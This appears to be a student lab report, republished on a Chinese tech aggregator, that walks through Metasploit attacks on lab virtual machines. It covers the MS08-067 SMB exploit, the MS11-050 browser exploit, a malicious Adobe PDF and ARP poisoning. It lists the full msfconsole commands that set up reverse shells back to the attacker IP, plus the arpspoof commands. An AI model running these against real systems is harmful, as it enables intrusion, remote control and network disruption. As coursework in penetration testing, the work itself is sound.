首页 > 其他 > 详细

20165229 Exp5 MSF基础应用

时间:2019-04-20 22:10:59      阅读:172      评论:0      收藏:0      [点我收藏+]

20165229 Exp5 MSF基础应用

一、基础问题回答

解释exploit,payload,encode是什么:

  • exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
  • payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
  • encode:是重新进行编码,伪装此次攻击,躲过查杀。

二、漏洞选择

1.主动攻击实践--ms08_067+generic/shell_reverse_tcp(成功!)

2.一个针对浏览器的攻击--ms11_050+windows/browser/ms11_050_mshtml_cobjectelement(成功!)

3.一个针对客户端的攻击-Adobe+generic/shell_reverse_tcp(成功!)

4.成功应用任何一个辅助模块--spoof arp+spoof/arp/arp_poisoning(成功&唯一!)

三、实验过程记录

(一)主动攻击实践--ms08_067

攻击机kali:192.168.43.234

靶机winXP:192.168.43.111

payload:generic/shell_reverse_tcp

  • 实验前检查两个虚拟机能否互ping通

技术分享图片

  • 在Kali中打开mfs,输入指令msfconsole进入控制台

  • 输入use exploit/windows/smb/ms08_067_netapi指令进行主动攻击

  • show payloads显示可用载荷

技术分享图片

  • set payload generic/shell_reverse_tcp选择载荷

  • show options显示配置信息

  • set RHOSTS 192.168.43.111设置靶机xp IP

  • set LHOST 192.168.43.234设置攻击机kali IP

  • exploit开始攻击

技术分享图片

(二)一个针对浏览器的攻击--ms11_050

攻击机kali:192.168.43.234

靶机win7:192.168.43.76

payload:windows/browser/ms11_050_mshtml_cobjectelement

  • 实验前检查两个虚拟机能否互ping通

技术分享图片

  • 在Kali中打开mfs,输入指令msfconsole进入控制台

  • 输入search ms11_050查找漏洞

  • 输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement选择漏洞

  • show payloads显示可用载荷

技术分享图片

  • set payload windows/meterpreter/reverse_tcp选择载荷

  • show payloads

  • set LHOST 192.168.43.234设置攻击机kali IP

  • set RHOST 192.168.43.76设置靶机win7 IP

  • exploit开始攻击

技术分享图片

  • win7下打开IE浏览器,输入上图网址http://192.168.43.234:8080/F9nYjt,如下图所示攻击成功,kali同时自动回连

技术分享图片

(三)一个针对客户端的攻击-Adobe

攻击机kali:192.168.43.234

靶机win7:192.168.43.76

payload:generic/shell_reverse_tcp

  • 在Kali中打开mfs,输入指令msfconsole进入控制台

  • search adobe查找漏洞

技术分享图片

  • 输入use windows/fileformat/adobe_cooltype_sing选择漏洞

  • show payloads显示可用载荷

技术分享图片

  • set payload generic/shell_reverse_tcp选择载荷

  • set LHOST 192.168.43.234设置攻击机kali IP

  • set FILENAME 5229msf.pdf设置生成的pdf文件名

  • exploit开始攻击

技术分享图片

  • 把上图所示的文件夹中的5229msf.pdf文件复制到u盘里,再拖到win7中

cp /root/.msf4/local/5229msf.pdf zkj420

技术分享图片

  • 回到kali,back退出当前模块,use exploit/multi/handler进入监听模块,set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.43.234设置kali IP

exploit开始监听

技术分享图片

  • win7中用Adobe9.0打开pdf文件,kali回连成功

技术分享图片

技术分享图片

(四)成功应用任何一个辅助模块--spoof arp

攻击机kali:192.168.43.234

靶机win7:192.168.43.76

漏洞:spoof/arp/arp_poisoning

  • 在Kali中打开mfs,输入指令msfconsole进入控制台

  • 输入show auxiliary,选择spoof/arp/arp_poisoning漏洞

技术分享图片

技术分享图片

  • 新开一个终端,fping -g 192.168.43.234/24查看哪些主机也在局域网中

  • 输入arpspoof -h查看命令使用方法

  • 输入arpspoof -i eth0 -t 192.168.43.76(win7 IP) 192.168.43.1(在此局域网中的另一主机IP)进行ARP攻击

技术分享图片

  • win7中浏览器无法访问任何网页,攻击成功

技术分享图片

  • 回到kali,按command+C停止攻击,win7 IE浏览器可以正常访问网页

技术分享图片

20165229 Exp5 MSF基础应用

原文:https://www.cnblogs.com/zkkj/p/10742758.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!